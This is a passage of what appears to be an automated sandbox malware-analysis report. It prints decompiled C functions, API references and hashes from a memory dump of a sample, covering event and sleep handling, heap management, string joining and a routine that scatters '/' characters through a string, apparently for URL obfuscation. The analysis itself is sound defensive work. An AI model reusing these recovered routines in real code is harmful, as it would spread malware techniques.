					goto L12;
				}
			}

0x008c797b
0x008c7982
0x008c798c
0x008c7990
0x008c7996
0x008c79a5
0x008c79ac
0x008c79b0
0x008c79c2
0x008c79c4
0x008c79c4
0x008c79c9
0x008c79d0
0x008c7a27
0x008c7a27
0x008c7a2d
0x008c7a2f
0x008c7a2f
0x008c7a39
0x008c7a3d
0x008c7a4f
0x008c7a4f
0x008c7a53
0x008c7a59
0x008c7a59
0x00000000
0x008c79e9
0x008c79ee
0x008c79f6
0x008c79fa
0x008c79fe
0x008c79fe
0x008c7a0b
0x008c7a0f
0x008c7a13
0x008c7a68
0x008c7a6e
0x008c7a6e
0x008c7a21
0x008c7a25
0x008c7a5c
0x008c7a5e
0x008c7a61
0x008c7a61
0x00000000
0x008c7a5e
0x008c7a25
0x00000000
0x008c7a0f

APIs

Part of subcall function 008C6702: lstrlen.KERNEL32(00000005,00000000,69B25F44,00000027,00000000,01309D08,00000000,?,?,69B25F44,00000005,008CA00C,4D283A53,?,?), ref: 008C6738
Part of subcall function 008C6702: lstrcpy.KERNEL32(00000000,00000000), ref: 008C675C
Part of subcall function 008C6702: lstrcat.KERNEL32(00000000,00000000), ref: 008C6764

CreateEventA.KERNEL32(008CA34C,00000001,00000000,00000000,61636F4C,00000001,00000000,?,?,00000000,?,008C68D0,?,?,?), ref: 008C79BB

Part of subcall function 008C789E: RtlFreeHeap.NTDLL(00000000,00000000,008C4E3E,00000000,?,00000000,00000000), ref: 008C78AA

WaitForSingleObject.KERNEL32(00000000,00004E20,008C68D0,00000000,00000000,?,00000000,?,008C68D0,?,?,?), ref: 008C7A1B
WaitForSingleObject.KERNEL32(00000000,00004E20,61636F4C,00000001,00000000,?,?,00000000,?,008C68D0,?,?,?), ref: 008C7A49
CloseHandle.KERNEL32(00000000,61636F4C,00000001,00000000,?,?,00000000,?,008C68D0,?,?,?), ref: 008C7A61

Memory Dump Source

Source File: 00000000.00000002.511144705.00000000008C1000.00000020.10000000.00040000.00000000.sdmp, Offset: 008C0000, based on PE: true

Associated: 00000000.00000002.511133416.00000000008C0000.00000004.10000000.00040000.00000000.sdmpDownload File
Associated: 00000000.00000002.511194522.00000000008C9000.00000002.10000000.00040000.00000000.sdmpDownload File
Associated: 00000000.00000002.511208474.00000000008CA000.00000004.10000000.00040000.00000000.sdmpDownload File
Associated: 00000000.00000002.511219310.00000000008CC000.00000002.10000000.00040000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8c0000_sadf.jbxd

Similarity

API ID: ObjectSingleWait$CloseCreateEventFreeHandleHeaplstrcatlstrcpylstrlen
String ID:
API String ID: 73268831-0
Opcode ID: 1a903014bb2a04db04a3d0a3440aa7d1b24c376c3a2a792990b272a9f1f6b6f9
Instruction ID: 794dfe129c7be8d000deae28ca9010702d9fae20b5aa19f107887c0cc8731e02
Opcode Fuzzy Hash: 1a903014bb2a04db04a3d0a3440aa7d1b24c376c3a2a792990b272a9f1f6b6f9
Instruction Fuzzy Hash: 1821E132614762ABC7219B789C48F6E76B9FB88B10F05062DFA96D7250DB34CE048A95

Uniqueness

Uniqueness Score: -1.00%

Function 008C6821 Relevance: 6.1, APIs: 4, Instructions: 87
sleepCOMMON

Download Yara Rule

C-Code - Quality: 39%

			E008C6821(void* __ecx, intOrPtr _a4, signed int* _a8, intOrPtr _a12) {
				intOrPtr _v12;
				void* _v16;
				void* _v28;
				char _v32;
				void* __esi;
				void* _t29;
				void* _t38;
				signed int* _t39;
				void* _t40;

				_t36 = __ecx;
				_v32 = 0;
				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosd");
				_v12 = _a4;
				_t38 = E008C6413(__ecx,  &_v32);
				if(_t38 != 0) {
					L12:
					_t39 = _a8;
					L13:
					if(_t39 != 0 && ( *_t39 & 0x00000001) == 0) {
						_t23 =  &(_t39[1]);
						if(_t39[1] != 0) {
							E008C14E2(_t23);
						}
					}
					return _t38;
				}
				if(E008C1CE6(0x40,  &_v16) != 0) {
					_v16 = 0;
				}
				_t40 = CreateEventA(0x8ca34c, 1, 0,  *0x8ca3e4);
				if(_t40 != 0) {
					SetEvent(_t40);
					Sleep(0xbb8);
					CloseHandle(_t40);
				}
				_push( &_v32);
				if(_a12 == 0) {
					_t29 = E008C155C(_t36);
				} else {
					_push(0);
					_push(0);
					_push(0);
					_push(0);
					_push(0);
					_t29 = E008C2331(_t36);
				}
				_t41 = _v16;
				_t38 = _t29;
				if(_v16 != 0) {
					E008C1544(_t41);
				}
				if(_t38 != 0) {
					goto L12;
				} else {
					_t39 = _a8;
					_t38 = E008C797A( &_v32, _t39);
					goto L13;
				}
			}

0x008c6821
0x008c682e
0x008c6834
0x008c6835
0x008c6836
0x008c6837
0x008c6838
0x008c683c
0x008c6848
0x008c684c
0x008c68d4
0x008c68d4
0x008c68d7
0x008c68d9
0x008c68e1
0x008c68e7
0x008c68ea
0x008c68ea
0x008c68e7
0x008c68f5
0x008c68f5
0x008c685f
0x008c6861
0x008c6861
0x008c6878
0x008c687c
0x008c687f
0x008c688a
0x008c6891
0x008c6891
0x008c689a
0x008c689e
0x008c68ac
0x008c68a0
0x008c68a0
0x008c68a1
0x008c68a2
0x008c68a3
0x008c68a4
0x008c68a5
0x008c68a5
0x008c68b1
0x008c68b4
0x008c68b8
0x008c68ba
0x008c68ba
0x008c68c1
0x00000000
0x008c68c3
0x008c68c3
0x008c68d0
0x00000000
0x008c68d0

APIs

CreateEventA.KERNEL32(008CA34C,00000001,00000000,00000040,?,?,74D0F710,00000000,74D0F730), ref: 008C6872
SetEvent.KERNEL32(00000000), ref: 008C687F
Sleep.KERNEL32(00000BB8), ref: 008C688A
CloseHandle.KERNEL32(00000000), ref: 008C6891

Part of subcall function 008C155C: WaitForSingleObject.KERNEL32(00000000,?,?,?,008C68B1,?,008C68B1,?,?,?,?,?,008C68B1,?), ref: 008C1636

Memory Dump Source

Source File: 00000000.00000002.511144705.00000000008C1000.00000020.10000000.00040000.00000000.sdmp, Offset: 008C0000, based on PE: true

Associated: 00000000.00000002.511133416.00000000008C0000.00000004.10000000.00040000.00000000.sdmpDownload File
Associated: 00000000.00000002.511194522.00000000008C9000.00000002.10000000.00040000.00000000.sdmpDownload File
Associated: 00000000.00000002.511208474.00000000008CA000.00000004.10000000.00040000.00000000.sdmpDownload File
Associated: 00000000.00000002.511219310.00000000008CC000.00000002.10000000.00040000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8c0000_sadf.jbxd

Similarity

API ID: Event$CloseCreateHandleObjectSingleSleepWait
String ID:
API String ID: 2559942907-0
Opcode ID: ed14b39679a73c654c036e01ca37bfcf5f7cba22f42b438fe22e3294334928d9
Instruction ID: 3b17bd2322731b7dc35486f0ff9d3d53106037c34eff0b8c186e262806b9046d
Opcode Fuzzy Hash: ed14b39679a73c654c036e01ca37bfcf5f7cba22f42b438fe22e3294334928d9
Instruction Fuzzy Hash: FB214C72D00229ABCF20AFE8C889EEEB7B9FF44350B05447DFA51E7101E634D9558BA1

Uniqueness

Uniqueness Score: -1.00%

Function 008C6643 Relevance: 6.1, APIs: 4, Instructions: 76
sleepstringCOMMON

Download Yara Rule

C-Code - Quality: 78%

			E008C6643(intOrPtr* __eax, void** _a4, intOrPtr* _a8) {
				intOrPtr _v8;
				void* _v12;
				void* _v16;
				intOrPtr _t26;
				intOrPtr* _t28;
				intOrPtr _t31;
				intOrPtr* _t32;
				void* _t39;
				int _t46;
				intOrPtr* _t47;
				int _t48;

				_t47 = __eax;
				_push( &_v12);
				_push(__eax);
				_t39 = 0;
				_t46 = 0;
				_t26 =  *((intOrPtr*)( *__eax + 0x24))();
				_v8 = _t26;
				if(_t26 < 0) {
					L13:
					return _v8;
				}
				if(_v12 == 0) {
					Sleep(0xc8);
					_v8 =  *((intOrPtr*)( *_t47 + 0x24))(_t47,  &_v12);
				}
				if(_v8 >= _t39) {
					_t28 = _v12;
					if(_t28 != 0) {
						_t31 =  *((intOrPtr*)( *_t28 + 0x100))(_t28,  &_v16);
						_v8 = _t31;
						if(_t31 >= 0) {
							_t46 = lstrlenW(_v16);
							if(_t46 != 0) {
								_t46 = _t46 + 1;
								_t48 = _t46 + _t46;
								_t39 = E008C7A71(_t48);
								if(_t39 == 0) {
									_v8 = 0x8007000e;
								} else {
									memcpy(_t39, _v16, _t48);
								}
								__imp__#6(_v16);
							}
						}
						_t32 = _v12;
						 *((intOrPtr*)( *_t32 + 8))(_t32);
					}
					 *_a4 = _t39;
					 *_a8 = _t46 + _t46;
				}
				goto L13;
			}

0x008c664f
0x008c6653
0x008c6654
0x008c6655
0x008c6657
0x008c6659
0x008c665c
0x008c6661
0x008c66f8
0x008c66ff
0x008c66ff
0x008c666a
0x008c6671
0x008c6681
0x008c6681
0x008c6687
0x008c6689
0x008c668e
0x008c6697
0x008c669d
0x008c66a2
0x008c66ad
0x008c66b1
0x008c66b3
0x008c66b4
0x008c66bd
0x008c66c1
0x008c66d2
0x008c66c3
0x008c66c8
0x008c66cd
0x008c66dc
0x008c66dc
0x008c66b1
0x008c66e2
0x008c66e8
0x008c66e8
0x008c66f1
0x008c66f6
0x008c66f6
0x00000000

APIs

Sleep.KERNEL32(000000C8), ref: 008C6671
lstrlenW.KERNEL32(?), ref: 008C66A7
memcpy.NTDLL(00000000,?,?,?), ref: 008C66C8
SysFreeString.OLEAUT32(?), ref: 008C66DC

Memory Dump Source

Source File: 00000000.00000002.511144705.00000000008C1000.00000020.10000000.00040000.00000000.sdmp, Offset: 008C0000, based on PE: true

Associated: 00000000.00000002.511133416.00000000008C0000.00000004.10000000.00040000.00000000.sdmpDownload File
Associated: 00000000.00000002.511194522.00000000008C9000.00000002.10000000.00040000.00000000.sdmpDownload File
Associated: 00000000.00000002.511208474.00000000008CA000.00000004.10000000.00040000.00000000.sdmpDownload File
Associated: 00000000.00000002.511219310.00000000008CC000.00000002.10000000.00040000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8c0000_sadf.jbxd

Similarity

API ID: FreeSleepStringlstrlenmemcpy
String ID:
API String ID: 1198164300-0
Opcode ID: 648bb78717b41da85b4b876e67a4d1d331168d619f3dcfdc7188a16e934d5e56
Instruction ID: be1dfaddef0f3f3ed0320c05193ce197cae0fa224af467e359653aeac5216dc0
Opcode Fuzzy Hash: 648bb78717b41da85b4b876e67a4d1d331168d619f3dcfdc7188a16e934d5e56
Instruction Fuzzy Hash: 42213C75901619EFCB11DFA8C988E9EBBB8FF59354B1081BDE942E7210EB30DA11CB51

Uniqueness

Uniqueness Score: -1.00%

Function 008C5454 Relevance: 6.1, APIs: 4, Instructions: 61
memorystringCOMMON

Download Yara Rule

C-Code - Quality: 68%

			E008C5454(unsigned int __eax, void* __ecx) {
				void* _v8;
				void* _v12;
				signed int _t21;
				signed short _t23;
				char* _t27;
				void* _t29;
				void* _t30;
				unsigned int _t33;
				void* _t37;
				unsigned int _t38;
				void* _t41;
				void* _t42;
				int _t45;
				void* _t46;

				_t42 = __eax;
				__imp__(__eax, _t37, _t41, _t29, __ecx, __ecx);
				_t38 = __eax;
				_t30 = RtlAllocateHeap( *0x8ca2d8, 0, (__eax >> 3) + __eax + 1);
				_v12 = _t30;
				if(_t30 != 0) {
					_v8 = _t42;
					do {
						_t33 = 0x18;
						if(_t38 <= _t33) {
							_t33 = _t38;
						}
						_t21 =  *0x8ca2f0; // 0x42b19a6b
						_t23 = 0x3c6ef35f + _t21 * 0x19660d;
						 *0x8ca2f0 = _t23;
						_t45 = (_t23 & 0x0000ffff) % (_t33 + 0xfffffff8) + 8;
						memcpy(_t30, _v8, _t45);
						_v8 = _v8 + _t45;
						_t27 = _t30 + _t45;
						_t38 = _t38 - _t45;
						_t46 = _t46 + 0xc;
						 *_t27 = 0x2f;
						_t13 = _t27 + 1; // 0x1
						_t30 = _t13;
					} while (_t38 > 8);
					memcpy(_t30, _v8, _t38 + 1);
				}
				return _v12;
			}

0x008c545c
0x008c545f
0x008c5465
0x008c547d
0x008c547f
0x008c5484
0x008c5486
0x008c5489
0x008c548b
0x008c548e
0x008c5490
0x008c5490
0x008c5492
0x008c549d
0x008c54a2
0x008c54b3
0x008c54bb
0x008c54c0
0x008c54c3
0x008c54c6
0x008c54c8
0x008c54cb
0x008c54ce
0x008c54ce
0x008c54d1
0x008c54dc
0x008c54e1
0x008c54eb

APIs

lstrlen.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,008C2314,00000000,?,7491C740,008C3831,00000000,01309600), ref: 008C545F
RtlAllocateHeap.NTDLL(00000000,?), ref: 008C5477
memcpy.NTDLL(00000000,01309600,-00000008,?,?,?,008C2314,00000000,?,7491C740,008C3831,00000000,01309600), ref: 008C54BB
memcpy.NTDLL(00000001,01309600,00000001,008C3831,00000000,01309600), ref: 008C54DC

Memory Dump Source

Source File: 00000000.00000002.511144705.00000000008C1000.00000020.10000000.00040000.00000000.sdmp, Offset: 008C0000, based on PE: true

Associated: 00000000.00000002.511133416.00000000008C0000.00000004.10000000.00040000.00000000.sdmpDownload File
Associated: 00000000.00000002.511194522.00000000008C9000.00000002.10000000.00040000.00000000.sdmpDownload File
Associated: 00000000.00000002.511208474.00000000008CA000.00000004.10000000.00040000.00000000.sdmpDownload File
Associated: 00000000.00000002.511219310.00000000008CC000.00000002.10000000.00040000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8c0000_sadf.jbxd

Similarity

API ID: memcpy$AllocateHeaplstrlen
String ID:
API String ID: 1819133394-0
Opcode ID: 3c46867e5abc4672b06ad01db1981a2b0172596fc022f5eea56ed2d5b48c457c
Instruction ID: 9509b27d63b233e966811e5178370096a8c05ddebea10962fc1b19d9247aaea8
Opcode Fuzzy Hash: 3c46867e5abc4672b06ad01db1981a2b0172596fc022f5eea56ed2d5b48c457c
Instruction Fuzzy Hash: 791129B2A00214BFC7148B69DC88E9EBBBEFB80361F04017AF404D7250E7719E40D7A1

Uniqueness

Uniqueness Score: -1.00%

Function 008C7571 Relevance: 6.0, APIs: 4, Instructions: 40
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E008C7571(void* __esi) {
				struct _SECURITY_ATTRIBUTES* _v4;
				void* _t8;
				void* _t10;

				_v4 = 0;
				memset(__esi, 0, 0x38);
				_t8 = CreateEventA(0, 1, 0, 0);
				 *(__esi + 0x1c) = _t8;
				if(_t8 != 0) {
					_t10 = CreateEventA(0, 1, 1, 0);
					 *(__esi + 0x20) = _t10;
					if(_t10 == 0) {
						CloseHandle( *(__esi + 0x1c));
					} else {
						_v4 = 1;
					}
				}
				return _v4;
			}

0x008c757b
0x008c757f
0x008c7594
0x008c7596
0x008c759b
0x008c75a1
0x008c75a3
0x008c75a8
0x008c75b3
0x008c75aa
0x008c75aa
0x008c75aa
0x008c75a8
0x008c75c1

APIs

memset.NTDLL ref: 008C757F
CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,74CF81D0,00000000,00000000), ref: 008C7594
CreateEventA.KERNEL32(00000000,00000001,00000001,00000000,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 008C75A1
CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00000000,008C3897,00000000,?), ref: 008C75B3

Memory Dump Source

Source File: 00000000.00000002.511144705.00000000008C1000.00000020.10000000.00040000.00000000.sdmp, Offset: 008C0000, based on PE: true

Associated: 00000000.00000002.511133416.00000000008C0000.00000004.10000000.00040000.00000000.sdmpDownload File
Associated: 00000000.00000002.511194522.00000000008C9000.00000002.10000000.00040000.00000000.sdmpDownload File
Associated: 00000000.00000002.511208474.00000000008CA000.00000004.10000000.00040000.00000000.sdmpDownload File
Associated: 00000000.00000002.511219310.00000000008CC000.00000002.10000000.00040000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8c0000_sadf.jbxd

Similarity

API ID: CreateEvent$CloseHandlememset
String ID:
API String ID: 2812548120-0
Opcode ID: b4b5b72fae9b3dddd1388133da8f185f2cbb62e3a4b938ea017d173d6aee2cb5
Instruction ID: b5de78dd8b2a647b8512b6785959d6e6d8fc1b8a6213b7e000a38abd861e7e23
Opcode Fuzzy Hash: b4b5b72fae9b3dddd1388133da8f185f2cbb62e3a4b938ea017d173d6aee2cb5
Instruction Fuzzy Hash: 87F0DAB5104708AFD6106F669CC4D27BBBCFB46298B11496EF64682511D671E9098AB0

Uniqueness

Uniqueness Score: -1.00%

Function 008C75C2 Relevance: 6.0, APIs: 4, Instructions: 29
memoryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E008C75C2() {
				void* _t1;
				intOrPtr _t5;
				void* _t6;
				void* _t7;
				void* _t11;

				_t1 =  *0x8ca30c; // 0x18c
				if(_t1 == 0) {
					L8:
					return 0;
				}
				SetEvent(_t1);
				_t11 = 0x7fffffff;
				while(1) {
					SleepEx(0x64, 1);
					_t5 =  *0x8ca35c; // 0x0
					if(_t5 == 0) {
						break;
					}
					_t11 = _t11 - 0x64;
					if(_t11 > 0) {
						continue;
					}
					break;
				}
				_t6 =  *0x8ca30c; // 0x18c
				if(_t6 != 0) {
					CloseHandle(_t6);
				}
				_t7 =  *0x8ca2d8; // 0xf10000
				if(_t7 != 0) {
					HeapDestroy(_t7);
				}
				goto L8;
			}

0x008c75c2
0x008c75c9
0x008c7613
0x008c7615
0x008c7615
0x008c75cd
0x008c75d3
0x008c75d8
0x008c75dc
0x008c75e2
0x008c75e9
0x00000000
0x00000000
0x008c75eb
0x008c75f0
0x00000000
0x00000000
0x00000000
0x008c75f0
0x008c75f2
0x008c75fa
0x008c75fd
0x008c75fd
0x008c7603
0x008c760a
0x008c760d
0x008c760d
0x00000000

APIs

SetEvent.KERNEL32(0000018C,00000001,008C394C), ref: 008C75CD
SleepEx.KERNEL32(00000064,00000001), ref: 008C75DC
CloseHandle.KERNEL32(0000018C), ref: 008C75FD
HeapDestroy.KERNEL32(00F10000), ref: 008C760D

Memory Dump Source

Source File: 00000000.00000002.511144705.00000000008C1000.00000020.10000000.00040000.00000000.sdmp, Offset: 008C0000, based on PE: true

Associated: 00000000.00000002.511133416.00000000008C0000.00000004.10000000.00040000.00000000.sdmpDownload File
Associated: 00000000.00000002.511194522.00000000008C9000.00000002.10000000.00040000.00000000.sdmpDownload File
Associated: 00000000.00000002.511208474.00000000008CA000.00000004.10000000.00040000.00000000.sdmpDownload File
Associated: 00000000.00000002.511219310.00000000008CC000.00000002.10000000.00040000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8c0000_sadf.jbxd

Similarity

API ID: CloseDestroyEventHandleHeapSleep
String ID:
API String ID: 4109453060-0
Opcode ID: 99f642ed6d3883a5156100abc6d97855a898a960ee17e375f44bf2ca0d9cb49c
Instruction ID: 25f8f386891ad903c81dfe7069e01ce2868f135f943ea912da7d925f3f08ddfa
Opcode Fuzzy Hash: 99f642ed6d3883a5156100abc6d97855a898a960ee17e375f44bf2ca0d9cb49c
Instruction Fuzzy Hash: 86F01571A04A119BDB249B7AEC8CF9637F8FB14761B040598BC01E32A1DB30D8408A60

Uniqueness

Uniqueness Score: -1.00%

Function 008C731D Relevance: 6.0, APIs: 4, Instructions: 28
sleepmemoryCOMMON

Download Yara Rule

C-Code - Quality: 37%

			E008C731D() {
				void* _v0;
				void** _t3;
				void** _t5;
				void** _t7;
				void** _t8;
				void* _t10;

				_t3 =  *0x8ca3cc; // 0x1309600
				__imp__( &(_t3[0x10]));
				while(1) {
					_t5 =  *0x8ca3cc; // 0x1309600
					_t1 =  &(_t5[0x16]); // 0x0
					if( *_t1 == 0) {
						break;
					}
					Sleep(0xa);
				}
				_t7 =  *0x8ca3cc; // 0x1309600
				_t10 =  *_t7;
				if(_t10 != 0 && _t10 != 0x8cb827) {
					HeapFree( *0x8ca2d8, 0, _t10);
					_t7 =  *0x8ca3cc; // 0x1309600
				}
				 *_t7 = _v0;
				_t8 =  &(_t7[0x10]);
				__imp__(_t8);
				return _t8;
			}

0x008c731d
0x008c7326
0x008c7336
0x008c7336
0x008c733b
0x008c7340
0x00000000
0x00000000
0x008c7330
0x008c7330
0x008c7342
0x008c7347
0x008c734b
0x008c735e
0x008c7364
0x008c7364
0x008c736d
0x008c736f
0x008c7373
0x008c7379

APIs

RtlEnterCriticalSection.NTDLL(013095C0), ref: 008C7326
Sleep.KERNEL32(0000000A), ref: 008C7330
HeapFree.KERNEL32(00000000), ref: 008C735E
RtlLeaveCriticalSection.NTDLL(013095C0), ref: 008C7373

Memory Dump Source

Source File: 00000000.00000002.511144705.00000000008C1000.00000020.10000000.00040000.00000000.sdmp, Offset: 008C0000, based on PE: true

Associated: 00000000.00000002.511133416.00000000008C0000.00000004.10000000.00040000.00000000.sdmpDownload File
Associated: 00000000.00000002.511194522.00000000008C9000.00000002.10000000.00040000.00000000.sdmpDownload File
Associated: 00000000.00000002.511208474.00000000008CA000.00000004.10000000.00040000.00000000.sdmpDownload File
Associated: 00000000.00000002.511219310.00000000008CC000.00000002.10000000.00040000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8c0000_sadf.jbxd

Similarity

API ID: CriticalSection$EnterFreeHeapLeaveSleep
String ID:
API String ID: 58946197-0
Opcode ID: 2c348a215b7150c59ba1b73dcf445a10d817487ed9066b513c0199b8e91ff0ce
Instruction ID: c7eb34a765bdd245522d501c0150bf9ac8b531cb1c3a9fba27fc9ff2c354da33
Opcode Fuzzy Hash: 2c348a215b7150c59ba1b73dcf445a10d817487ed9066b513c0199b8e91ff0ce
Instruction Fuzzy Hash: A1F0B7746046859BE7188B68DC59F1677B4FB54309B04515CE902C73A0C730EC00DA16

Uniqueness

Uniqueness Score: -1.00%

Function 008C452E Relevance: 5.1, APIs: 4, Instructions: 70
stringCOMMON

Download Yara Rule

C-Code - Quality: 58%

			E008C452E(void* __eax, void* __ecx, void* _a4, void** _a8, intOrPtr* _a12) {
				intOrPtr* _v8;
				void* _t17;
				intOrPtr* _t22;
				void* _t27;
				char* _t30;
				void* _t33;
				void* _t34;
				void* _t36;
				void* _t37;
				void* _t39;
				int _t42;

				_t17 = __eax;
				_t37 = 0;
				__imp__(_a4, _t33, _t36, _t27, __ecx);
				_t2 = _t17 + 1; // 0x1
				_t28 = _t2;
				_t34 = E008C7A71(_t2);
				if(_t34 != 0) {
					_t30 = E008C7A71(_t28);
					if(_t30 == 0) {
						E008C789E(_t34);
					} else {
						_t39 = _a4;
						_t22 = E008C7ABF(_t39);
						_v8 = _t22;
						if(_t22 == 0 ||  *_t22 !=  *((intOrPtr*)(_t22 + 1))) {
							_a4 = _t39;
						} else {
							_t26 = _t22 + 2;
							_a4 = _t22 + 2;
							_t22 = E008C7ABF(_t26);
							_v8 = _t22;
						}
						if(_t22 == 0) {
							__imp__(_t34, _a4);
							 *_t30 = 0x2f;
							 *((char*)(_t30 + 1)) = 0;
						} else {
							_t42 = _t22 - _a4;
							memcpy(_t34, _a4, _t42);
							 *((char*)(_t34 + _t42)) = 0;
							__imp__(_t30, _v8);
						}
						 *_a8 = _t34;
						_t37 = 1;
						 *_a12 = _t30;
					}
				}
				return _t37;
			}

0x008c452e
0x008c4538
0x008c453a
0x008c4540
0x008c4540
0x008c4549
0x008c454d
0x008c4559
0x008c455d
0x008c45d1
0x008c455f
0x008c455f
0x008c4563
0x008c4568
0x008c456d
0x008c4587
0x008c4576
0x008c4576
0x008c457a
0x008c457d
0x008c4582
0x008c4582
0x008c458c
0x008c45b4
0x008c45ba
0x008c45bd
0x008c458e
0x008c4590
0x008c4598
0x008c45a3
0x008c45a8
0x008c45a8
0x008c45c4
0x008c45cb
0x008c45cc
0x008c45cc
0x008c455d
0x008c45dc

APIs

lstrlen.KERNEL32(00000000,00000008,?,74CB4D40,?,?,008C2C92,?,?,?,?,00000102,008C5D46,?,?,74CF81D0), ref: 008C453A

Part of subcall function 008C7A71: RtlAllocateHeap.NTDLL(00000000,00000000,008C4DB1), ref: 008C7A7D

Part of subcall function 008C7ABF: StrChrA.SHLWAPI(?,0000002F,00000000,00000000,008C4568,00000000,00000001,00000001,?,?,008C2C92,?,?,?,?,00000102), ref: 008C7ACD
Part of subcall function 008C7ABF: StrChrA.SHLWAPI(?,0000003F,?,?,008C2C92,?,?,?,?,00000102,008C5D46,?,?,74CF81D0,00000000), ref: 008C7AD7

memcpy.NTDLL(00000000,00000000,00000000,00000000,00000001,00000001,?,?,008C2C92,?,?,?,?,00000102,008C5D46,?), ref: 008C4598
lstrcpy.KERNEL32(00000000,00000000), ref: 008C45A8
lstrcpy.KERNEL32(00000000,00000000), ref: 008C45B4

Memory Dump Source

Source File: 00000000.00000002.511144705.00000000008C1000.00000020.10000000.00040000.00000000.sdmp, Offset: 008C0000, based on PE: true

Associated: 00000000.00000002.511133416.00000000008C0000.00000004.10000000.00040000.00000000.sdmpDownload File
Associated: 00000000.00000002.511194522.00000000008C9000.00000002.10000000.00040000.00000000.sdmpDownload File
Associated: 00000000.00000002.511208474.00000000008CA000.00000004.10000000.00040000.00000000.sdmpDownload File
Associated: 00000000.00000002.511219310.00000000008CC000.00000002.10000000.00040000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8c0000_sadf.jbxd

Similarity

API ID: lstrcpy$AllocateHeaplstrlenmemcpy
String ID:
API String ID: 3767559652-0
Opcode ID: e7014937d2b67b45ef3722c166863dd85dd8faf2d1ac6d4f5b6127f2b3b26b4d
Instruction ID: 745773135ede2e7b57be003a8e5686fcea62211ed7f58244f8c5431a3bea5399
Opcode Fuzzy Hash: e7014937d2b67b45ef3722c166863dd85dd8faf2d1ac6d4f5b6127f2b3b26b4d
Instruction Fuzzy Hash: 91219D72504259ABCB12AF68CC98FAE7FB8FF15394B148058F905DB211DA31CE418BA1

Uniqueness

Uniqueness Score: -1.00%

Function 008C262D Relevance: 5.0, APIs: 4, Instructions: 39
stringCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E008C262D(void* __ecx, WCHAR* _a4, WCHAR* _a8) {
				void* _v8;
				void* _t18;
				int _t25;
				int _t29;
				int _t34;

				_t29 = lstrlenW(_a4);
				_t25 = lstrlenW(_a8);
				_t18 = E008C7A71(_t25 + _t29 + _t25 + _t29 + 2);
				_v8 = _t18;
				if(_t18 != 0) {
					_t34 = _t29 + _t29;
					memcpy(_t18, _a4, _t34);
					_t10 = _t25 + 2; // 0x2
					memcpy(_v8 + _t34, _a8, _t25 + _t10);
				}
				return _v8;
			}

0x008c2642
0x008c2646
0x008c2650
0x008c2655
0x008c265a
0x008c265c
0x008c2664
0x008c2669
0x008c2677
0x008c267c
0x008c2686

APIs

lstrlenW.KERNEL32(004F0053,?,74CB5520,00000008,013093CC,?,008C627D,004F0053,013093CC,?,?,?,?,?,?,008C521B), ref: 008C263D
lstrlenW.KERNEL32(008C627D,?,008C627D,004F0053,013093CC,?,?,?,?,?,?,008C521B), ref: 008C2644

Part of subcall function 008C7A71: RtlAllocateHeap.NTDLL(00000000,00000000,008C4DB1), ref: 008C7A7D

memcpy.NTDLL(00000000,004F0053,74CB69A0,?,?,008C627D,004F0053,013093CC,?,?,?,?,?,?,008C521B), ref: 008C2664
memcpy.NTDLL(74CB69A0,008C627D,00000002,00000000,004F0053,74CB69A0,?,?,008C627D,004F0053,013093CC), ref: 008C2677

Memory Dump Source

Source File: 00000000.00000002.511144705.00000000008C1000.00000020.10000000.00040000.00000000.sdmp, Offset: 008C0000, based on PE: true

Associated: 00000000.00000002.511133416.00000000008C0000.00000004.10000000.00040000.00000000.sdmpDownload File
Associated: 00000000.00000002.511194522.00000000008C9000.00000002.10000000.00040000.00000000.sdmpDownload File
Associated: 00000000.00000002.511208474.00000000008CA000.00000004.10000000.00040000.00000000.sdmpDownload File
Associated: 00000000.00000002.511219310.00000000008CC000.00000002.10000000.00040000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8c0000_sadf.jbxd

Similarity

API ID: lstrlenmemcpy$AllocateHeap
String ID:
API String ID: 2411391700-0
Opcode ID: cdc38ae2a17590fbcfd277ea20ebae2c07a712c53ce3bd62000eb86ab8dbec60
Instruction ID: 90cc8a527078fe80381b0bf36c1f929092fa210983c3b05f57c5712a508634fc
Opcode Fuzzy Hash: cdc38ae2a17590fbcfd277ea20ebae2c07a712c53ce3bd62000eb86ab8dbec60
Instruction Fuzzy Hash: 87F04976900119BB8F11EFA8CC89CDE7BBCFF083A47018066F904D7212E631EB109BA0

Uniqueness

Uniqueness Score: -1.00%

Function 008C6311 Relevance: 5.0, APIs: 4, Instructions: 27stringCOMMON

Download Yara Rule

APIs

lstrlen.KERNEL32(01309CE0,00000000,00000000,00000000,008C385C,00000000), ref: 008C6321
lstrlen.KERNEL32(?), ref: 008C6329

Part of subcall function 008C7A71: RtlAllocateHeap.NTDLL(00000000,00000000,008C4DB1), ref: 008C7A7D

lstrcpy.KERNEL32(00000000,01309CE0), ref: 008C633D
lstrcat.KERNEL32(00000000,?), ref: 008C6348

Memory Dump Source

Source File: 00000000.00000002.511144705.00000000008C1000.00000020.10000000.00040000.00000000.sdmp, Offset: 008C0000, based on PE: true

Associated: 00000000.00000002.511133416.00000000008C0000.00000004.10000000.00040000.00000000.sdmpDownload File
Associated: 00000000.00000002.511194522.00000000008C9000.00000002.10000000.00040000.00000000.sdmpDownload File
Associated: 00000000.00000002.511208474.00000000008CA000.00000004.10000000.00040000.00000000.sdmpDownload File
Associated: 00000000.00000002.511219310.00000000008CC000.00000002.10000000.00040000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

